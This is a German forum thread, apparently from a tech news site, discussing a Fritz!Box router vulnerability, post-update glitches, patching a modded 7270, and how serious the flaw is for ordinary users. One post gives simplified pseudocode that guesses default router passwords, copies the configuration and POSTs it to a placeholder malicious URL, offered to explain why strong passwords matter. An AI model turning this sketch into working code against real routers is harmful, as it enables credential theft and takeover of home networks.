News Angriffe auf Fritz!Box-Router ohne Fernzugriff möglich

[Krautmaster]

-> ich hab das Update vor einiger Zeit installiert

-> hatte nach dem Update massive Probleme bei DECT (7390) -> wenn eine eingehende Nummer auf mehreren Telefonen klingeln soll, dann kam der Anruf nicht an. Abgehend war möglich

-> musste die Telefone und Nummer neu zuweisen, Die Settings durchwürfeln, dann gings wieder.

-> desweiteren arbeitete mein Wifi nach dem Update trotz "Autochannel" Genau auf dem Kanal des Nachbars -> hatte mich über ständige Abbrüche gewundert. -> Manuell geswitched und dann wieder auf "Auto"

 

[X_Clamp]

Würde mich freuen, wenn hier auch jemand ne gefritzte FRITZ!Box Fon WLAN 7270 v2 Speedport W920V betreibt und was über einen Patch weiss. Kenne mich da leider nicht so gut aus ;(

 

[longwalk]

ist meine alte FritzBox 7050 auch betroffen?

Das würde mich auch brennend interessieren.

 

[dMopp]

Würde mich freuen, wenn hier auch jemand ne gefritzte FRITZ!Box Fon WLAN 7270 v2 Speedport W920V betreibt und was über einen Patch weiss. Kenne mich da leider nicht so gut aus ;(

Wenn du dich nicht so aus kennst, wieso dann gefritzt ? Brauchst du IRGENDWAS von den Features? Falls nein: w921v. Und wenn du nicht mal ISDN brauchst dann nimm den w724v, der hat soagr WLAN AC

 

[X_Clamp]

Wenn du dich nicht so aus kennst, wieso dann gefritzt ? Brauchst du IRGENDWAS von den Features? Falls nein: w921v. Und wenn du nicht mal ISDN brauchst dann nimm den w724v, der hat soagr WLAN AC

Ich will nicht nen neuen Router, sondern meinen jetzigen auf den neuesten Softwarestand bringen. Den habe ich damals schon gefritzt gekauft und alleine schon die Autoreconnect Funktion mittels Software ist es Wert, den Router zu fritzen. Also bitte nicht nach dem Sinn fragen, sondern lieber helfen, wie man diesen Router mit dem aktuellen Patch versehen kann ...

 

[Wilhelm14]

http://webgw.avm.de/download/t_download.jsp?partid=17122#top

Gibt also ein Update. Ich würde neu fritzen.

 

[sirwuffi]

computerbase sollte auch darauf hinweisen, dass die recht verbreiteten synology diskstations auch kürzlich von einer hackerattacke betroffen sind.
http://www.heise.de/newsticker/meld...te-als-Bitcoin-Miner-missbraucht-2113423.html

bzw. wo kann man denn hier news melden ?

 

[Helmpflicht]

Ich frag mich ja, wie lange so ein ARM-Ding an einem Hash rumrechnen muss. 1000 Jahre?

 

[Naddel_81]

also wie kritisch ist die lücke jetzt wirklich? ist realistisch betrachtet davon auszugehen, dass jemand ohne passwörter in null komma nix bei tante erna, die nur ab und zu mal lovefilm guckt und mails abruft, einbricht und ihr ne hohe telefonrechnung verpasst?

oder ist das nur bei leuten kritisch, die "123456" als passwort haben und täglich auf viren-baukit-seiten rumsurfen?

 

[dMopp]

Viele Router sind OHNE Passwort (oder standard PW) käuflich erwerblich. Diese Router sind davon betroffen 8dank XSS sogar noch nach dem Patch, ja ein einfaches JS sich ohne Probleme einloggen kann).

Wie auch immer, betrifft mich zum Glück nicht

 

[Morphy2k]

also wie kritisch ist die lücke jetzt wirklich? ist realistisch betrachtet davon auszugehen, dass jemand ohne passwörter in null komma nix bei tante erna, die nur ab und zu mal lovefilm guckt und mails abruft, einbricht und ihr ne hohe telefonrechnung verpasst?

oder ist das nur bei leuten kritisch, die "123456" als passwort haben und täglich auf viren-baukit-seiten rumsurfen?

Das Passwort ist egal, die gesamte Config wird an den Hacker geschickt, da steht das Passwort im Klartext
Es kann jedem passieren, auch auf seriösen Seiten.

 

[Naddel_81]

Das Passwort ist egal, die gesamte Config wird an den Hacker geschickt, da steht das Passwort im Klartext
Es kann jedem passieren, auch auf seriösen Seiten.

steht hier aber gänzlich anders.

http://www.chip.de/news/Fritzbox-Hack-So-updaten-die-Provider-die-Geraete_66922776.html

man benötigt laut quelle die login-daten für den fernzugriff.

 

[dMopp]

Noch mal: Braucht man generell nicht.

Ich implementiere ein JS, dass sich von DEINEM RECHNER aus mit der FB verbindet, alle Daten an mich schickt und direkt noch den Port öffnet. Daten habe ich ja dann

 

[easy.2ci]

Helfen tun dagegen nur gute Passwörter

Aber das Passwort für meine GUI kennen die Gauner doch, da die Fritzbox das ja bekannt gibt. Das betten sie dann im Javascript Code und schicken es an meinen Browser der das dann aus dem LAN ausführt.

 

[dMopp]

Ich meinte ein Passwort für die GUI . Wenn das JS sich nicht in die FB einloggen kann (mangels PW) kann das JS nix weiter machen. Eine Ausnahme ist die aktuelle Sicherheitslücke die das offenbar aushebelt.

 

[Naddel_81]

Ich meinte ein Passwort für die GUI . Wenn das JS sich nicht in die FB einloggen kann (mangels PW) kann das JS nix weiter machen. Eine Ausnahme ist die aktuelle Sicherheitslücke die das offenbar aushebelt.

woher kommt das PW? hab es ja nirgends gespeichert.

 

[Morphy2k]

Nochmal, mit der aktuellen Sicherheitslücke braucht es kein Passwort um die Config der Box auf einen externen Server zu laden, dort steht alles drin was ein Hacker braucht, im Klartext.

 

[dMopp]

So, ich versuche es in Länger:

Wichtig ist, dass man beim Einrichten seines Routers ein brauchbares Kennwort für das Webinterface ausdenkt (Keine einfaches Wörter, nicht die Mailadresse, nicht das Geburtsdatum etc...).

Gehen wir mal davon aus, es existiert ein JavaScript das folgendes macht: (ganz vereinfachter pseudocode)

defaultPWs [ admin, login, ADMIN, sicher, sehrsicher, 1234, bla]
for passwort in defaultPWs; do
curl -h fritz.box/login.bla --password=$passwort > headerdata
done
copyConfig from fritz.box --use-header $headerdata > config
curl url-des-bösen --POST $config

Das schafft sogar nen kleiner ARM unter einer Sekunde (die Liste lässt sich ja erweitern wenn man will). Wichtig ist halt, dass das gewählte passwort sich nicht per einfacher Liste rausfinden lässt.


Im aktuellen Fall scheint es aber so zu sein, dass eine Lücke existiert, die es ermöglicht sogar die PW Abfrage zu umgehen.

Einzige Abhilfe: JS auf allen Geräten verbieten die hinterm Router hängen bis es gefixt ist. Wenn der Patch schon eingespielt ist, gilt das mit nem brauchbaren Passwort aber noch immer

 

[Naddel_81]

ok, also ohne script kein exploit. danke für die erklärung. und danke an noscript für die sicherheit

 

[Morphy2k]

Nein, laut offizieller Aussage von Heise ist kein JS erforderlich, das geht auch ohne

Also jeden Grund zu Sorge.